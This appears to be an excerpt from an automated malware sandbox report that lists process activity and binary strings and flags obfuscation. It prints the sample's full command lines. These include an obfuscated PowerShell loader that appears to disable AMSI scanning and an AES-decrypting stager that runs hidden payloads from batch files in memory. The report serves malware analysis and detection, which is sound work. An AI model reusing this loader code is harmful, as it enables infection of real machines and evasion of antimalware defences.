Source: C:\Windows\System32\dllhost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\lsass.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\lsass.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: payload.cmd

Static file information: File size 5214429 > 1048576

Source:	Binary string: System.Configuration.Install.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Management.Automation.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Data.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Management.pdb@` source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000033.00000002.2566233511.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127214561.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.DirectoryServices.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.Powershell.PSReadline.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Core.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Numerics.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000033.00000002.2566233511.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127214561.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.DirectoryServices.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.ServiceProcess.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Numerics.pdbP source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: mscorlib.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831le.js source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.ServiceProcess.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.Install.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Xml.pdbP4 source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: mscorlib.pdbL source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdbM* source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.PowerShell.Security.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Xml.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.DirectoryServices.pdbirFKI source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.Powershell.PSReadline.pdbP source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.DirectoryServices.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.CSharp.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Data.ni.pdbRSDSC source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Data.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Configuration.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.ServiceProcess.pdbpx' source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Xml.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Drawing.pdbH source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Management.Automation.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Numerics.ni.pdbRSDSautg source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Data.pdbH source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Management.Automation.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Management.Automation.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: mscorlib.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbog source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Drawing.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Management.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.Management.Infrastructure.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Windows.Forms.pdbk. source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Management.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Core.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Transactions.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.PowerShell.Security.pdbh source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.pdbg source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Transactions.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Numerics.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Transactions.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer($XzRrrWAvhAruOw,$gdhANoUlJqediWutYNx).Invoke('ams'+[Char](105)+'.'+'d'+'l'+[Char](108)+'');$fOLdsZyQIYWPbckDA=$yPaGlLGCRnduqK.Invoke($Null,@([Object]$qNkPxqC,[Object](''+
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+'r'+''+'b'+''+'x'+

Obfuscated command line found

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gUdwtNDYXkts{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EysuTOhjuDXEDH,[Parameter(Position=1)][Type]$WayEsuPNIC)$posiItcnXQZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$posiItcnXQZ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'ci'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+'d'+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$posiItcnXQZ.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+'l',$WayEsuPNIC,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $posiItcnXQZ.CreateType();}$CXUkrbOMeMwqm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+'t'+''+[Char](101)+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[

Suspicious command line found

Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { 